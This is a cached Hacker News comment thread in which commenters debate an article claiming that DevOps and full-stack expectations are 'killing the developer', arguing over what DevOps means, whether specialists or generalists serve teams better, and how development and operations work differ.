The description of DevOps from the article describes what I do at a large multinational software company really well. In our project we have 5-7 developers who test each other's code and functionality and one DevOps who does build/test environment, databases, release management, change management, impact analysis with regression testing, and fixes bugs, but rarely develops new features. It's being done not because of the startup culture, which we do not have. It's done for efficiency. Every request to the DB team, even minor, will take at least three days to process. We do not have so much time to waste, so we have to do everything ourselves, unless it's something that requires an actual expert in the particular topic to accomplish.
38
rythie 2 days ago 0 replies      
I think there is a lot of misunderstanding here, to me DevOps is not just automation (we've had that for a long time, Perl, cron, cfengine etc).

It's much about applying the same processes you would apply in development to Ops. For example committing changes into version control and only using that, not live patching things, much like you wouldn't live edit a website.

Also being able to spin up new servers based on a config and not requiring manual config to get it going. Automation alone does not get rid of 'snowflake servers' http://martinfowler.com/bliki/SnowflakeServer.html

Also, it can be about letting developers get the exact same environment for development/testing at no additional time cost - which in turn makes it more likely that code changes can go live without problems or delays.

39
mh_yam 1 day ago 0 replies      
Every place I've seen DevOps, seems that developers bear the brunt of the work - learning the infrastructure and understanding deployments and such. I've never seen Ops people learning the codebase or even the software architecture / data structures.

Maybe that wasn't true "DevOps"?

40
rmrfrmrf 2 days ago 0 replies      
While I get the need for page views, I really wish problematic aspects of any tech movement could be discussed in a way that actually improves things rather than tears them down.

You hate xyz? OK, but apparently xyz has enough merit to get the attention of quite a few people, so let's identify the problem areas and make xyz better rather than resorting to hyperbole and melodrama.

41
danso 2 days ago 0 replies      
The OP makes a relatively uncontroversial point (that people will be specialized, and better, at a finite set of skills)...so I think "killing the developer" is a little dramatic.

However, I think as with most things that involve computational thinking and automation, this is not a zero-sum game. A developer who can apply deterministic, testable processes to server-ops may be able to reap an adequate amount of benefit for significantly lower cost than a specialized sysadmin. In addition, the developer is augmenting his/her own skills in the process. Yes, that dev was not able to focus all of their time on...whatever part of the stack they are meant to specialize in...on the other hand, the time spent studying dev ops is not necessarily a sunk cost.

For my own part, I've tried to stay away from sys-admin as much as possible...but when I've been pushed into it, I've gotten something out of it beyond just getting the damn server up. For example, better familiarity with UNIX tools and the importance of "text-as-an-interface"...which does apply to high-level web development...nevermind the efficiency you gain by being able to stay in the shell when most appropriate (rather than, say, figure out how to wrangle server commands in a brittle capistrano script).

But hell, even the end product itself, just being able to deploy a server with some confidence...is kind of empowering. For me, it opens up new ways to run scripts and jobs...It sounds dumb and maybe it's just the way my brain poorly functions, but the concepts of server-oriented architecture become so much clearer when you can spin up different machines to play with and experiment with delegation.

42
mathattack 2 days ago 0 replies      
It seems like the OP is advocating the surgical team [0] approach to software development. This seems very consistent with DevOps. Have a group of specialists that are good at automating operations surround the key developers.

[0] http://c2.com/cgi/wiki?SurgicalTeam

43
fauigerzigerk 2 days ago 0 replies      
>Large companies love this, as it means they can hire far fewer people to do the same amount of work.

But they cost much more as well. Following that logic, it would be in the interest of hospitals to make "full-stack-doctors" clean toilets.

44
lawncheer 2 days ago 0 replies      
DevOps, at least imo, is not about technology. It is about culture, and applying practices to speed up the various loops across organizational groups (marketing, sales, developers, ops). Of course there will always be trade-offs, if you don't have the budget to hire both an expert in the technologies that, say for example, speed up configuration management, and prevent snowflake servers AND someone to develop the code for the product, the person you do hire, will have to either pull double duty, or the org will have to plan for the fact that it is probably going to be doing "stuff" slower.
45
rhizome 2 days ago 0 replies      
The problem with DevOps is that it's a meaningless term. Look at all the comments here, all starting off with what "DevOps is," or "Devops isn't." Instances of people arguing past each other based on different interpretations.

You can't have a fruitful discussion when everybody uses it differently.

46
cracell 2 days ago 0 replies      
The author needs to read or reread The Mythical Man Month. Even in a large organization there are important benefits to having fewer people on a team. Even if this means that someone is sometimes doing work that they are overqualified for.

He makes some good points but he misses the value of needing fewer people to accomplish the same thing.

47
TYPE_FASTER 2 days ago 0 replies      
The role of DevOps is to help developers work more efficiently, not give developers more work to do. An example of this could be a TFS administrator who works on TFS build template changes and configuration to make the build and deploy process as automated as possible. Nothing to do with being a startup, or trying to get more work done with fewer people.
48
mlieberman85 2 days ago 0 replies      
I disagree with the central thesis of his argument that being generalized is a detriment and that operations and other factors should remain siloed at your average large company. I've worked at both large companies (10k+ employees) and small companies and many things in between.

In general a Full Stack DevOps oriented approach always tends to be more efficient. You have less monolithic hard to maintain applications because you force the teams to be small and agile. People will have their specialties (operations, backend, frontend, etc.) but still remain generalized enough to have an idea of the big picture. If your application has issues where the frontend developer doesn't know the general idea of how Varnish and Nginx in your stack are setup then perhaps your application is too big and complex.

49
jassinpain 2 days ago 0 replies      
Before you start to complain, I am a fan of collaboration but Devops might just be the best joke ever! The truth is it means something different to every person. For years I have defined Devops as Engineers trying to get Ops out of the way and pushing forward without those pesky sys admins. You think I am overblowing it? I have been in the Silicon Valley for the boom of Devops and I hear it all the time: "We don't need ops, we can just have a developer do it." The number of new startups who use AWS thus allowing them to forgo a system administrator never ceases to amaze me. My biggest problem with this is you're cutting the legs out from yourself, but you're assuring me job security so maybe I should keep my mouth shut.

I have been an operations engineer for over ten years now, and honestly developers and ops engineers have different ways of functioning. To me a good software engineer has long term focus, can get deep into a project and crunch on the same code for extended durations. Give a good coder a project that will take weeks or even months and they will put their head down and solve your problem. As a generalization these people do not handle interrupt driven work well, they also often do not handle high pressure situations well.

Operations people on the other hand do the majority of their work under massive interruption and constant pressure. Tell an operations engineer the site is down and they will not focus on what the origin of the problem is, they will focus on getting the product back online and come back to fully understand why. This does not mean they do not troubleshoot but they are trying to identify the immediate cause not the who or root. One might argue this is short-sighted but when you're stuck waiting for someone to figure out why the web servers were started you're killing your customer experience. I would argue restart the web pool get the product back online and then start to look at root cause once you have identified the customer impact problem and completed the shortest path solution.

When you start off by having your engineers run operations you never allow new ops people to start from ground up and develop their skills, learning the pain points as the system grows thus ensuring when you grow to the point that you need an operations engineer there is a shortage of trained people available. One might argue that some of the developers that started the company by running operations will become your operations engineers and will cover this but to me that's like using a vice grips to remove a bolt.
50
davidgerard 2 days ago 0 replies      
"As a sysadmin, I would like developers to pay any damn attention to what happens in live before deploy without me having to cattle-prod them into doing so after deploy, so I don't have due cause to set them on fire."
51
dnyce 2 days ago 0 replies      
I love this article and couldn't agree with its central premise more. I can think of no other industry that demands an individual wear as many brain intensive hats as that of the developer today. These jobs which used to be distributed are quickly becoming the baseline for how an individual applicant is judged. I for one believe that if we focus, we can become a true master of skill AND compile that with understanding of the "whole stack" but never being forced to maintain more than our fair share of that stack.
52
balls187 2 days ago 0 replies      
What non-startups are trying to hire jack of all trade generalist devs?
53
rubiquity 2 days ago 0 replies      
Similar title: How Buzzwords Are Killing The Developer

... because DevOps is just a buzzword at this point.

54
markbnj 2 days ago 0 replies      
As a developer of course it's tempting to agree with the author's hierarchy. Masters of the IT world! But really it's over-simplified. As a dev with many years of experience there's no part of the stack I can't work in and figure out what I need to do. But that doesn't replace actual operational experience and oversight. You make do in startup or small team because you have to, so I guess ultimately I agree with the piece.
55
halayli 2 days ago 0 replies      
It's interesting to see how the term devops is stretched to mean anything you want. This term should die because it confuses many.
56
teacup50 2 days ago 0 replies      
The author couldn't be more off-base in his understanding of how devops came to be, and his attitude is exactly the kind of cost-ineffective developer behavior that led to the partial unification of development and operations to begin with.

It has nothing to do with limited startup resources, and everything to do with managing externalities.

Specifically, developers have an enormous amount of control over the stability and deployability of their software: technical decisions made at almost all levels of the stack directly and significantly impact the costs of QA and Operations.

The people best suited to automating deployment and ensuring code quality are the people writing the code.

If you entirely externalize the costs of those two things, natural human laziness takes over, and developers punt bugs and deployment costs to the external QA and operations teams, ballooning the overall cost to the company.

57
dmourati 2 days ago 0 replies      
Show me a developer who can do anything in Operations and I'll show you someone who gets the DevOps philosophy.
58
michaelochurch 2 days ago 0 replies      
It seems to me that the OP's real objection isn't to "DevOps" but with the reality of the software industry. He's upset that developers often are asked to do "lower" work. I find that a bit simplistic on his part. If anything, DevOps at its best is about elevating the ops work (by recognizing automation possibilities).

The issue is that employers are horribly inconsistent. They demand specialism in hiring, but refuse to respect specialties once they've pulled people in. Thus, you end up having to interview like a real computer scientist, only to find that most of the work is mind-numbing for a serious programmer, but that there's no one around at-level for it because "we only hire A players".

DevOps didn't do this. The problem is the industry, not one concept.

59
conorwade 2 days ago 1 reply      
Interesting. I always thought of "Full-stack" developers from a web perspective being capable of coding from the client to the server. Never thought of them being devs that do ops also.
60
LinuxDevOps 2 days ago 0 replies      
I'm glad to see that most people here are replying objecting that the writer's view or definition of a DevOps is not what seems to be the most accepted/popular view.
61
Finster 2 days ago 0 replies      
Hmm. Let's just ask the guy that took the Penny Arcade DevOps job.
62
RRRA 2 days ago 0 replies      
Most coders I see would be useless as sysadmins...
63
WWLink 2 days ago 0 replies      
I love the dentist example. Imagine if dentists were treated like developers. It'd be hilarious!
64
Fasebook 2 days ago 0 replies      
tl;dr: there's a problem here in software, and I don't know what it is, let's fix it by acknowledging its existence and then going back to what we normally do.
65
peterwwillis 2 days ago 0 replies      
This is a really badly written article but I know the point he's trying to make.

DevOps is stupid because it fractures expertise and makes it more difficult to get work done. By splitting up roles you get more domain-specific knowledge, have more time to work on a single problem, and provide support for your co-workers who also have different specific roles. I would much prefer to work with specialists than generalists.

66
manojit 2 days ago 1 reply      
Too much scepticism.
67
dkarapetyan 2 days ago 1 reply      
There is no content here. Why are people explaining themselves and upvoting this nonsense?
       cached 18 April 2014 04:11:01 GMT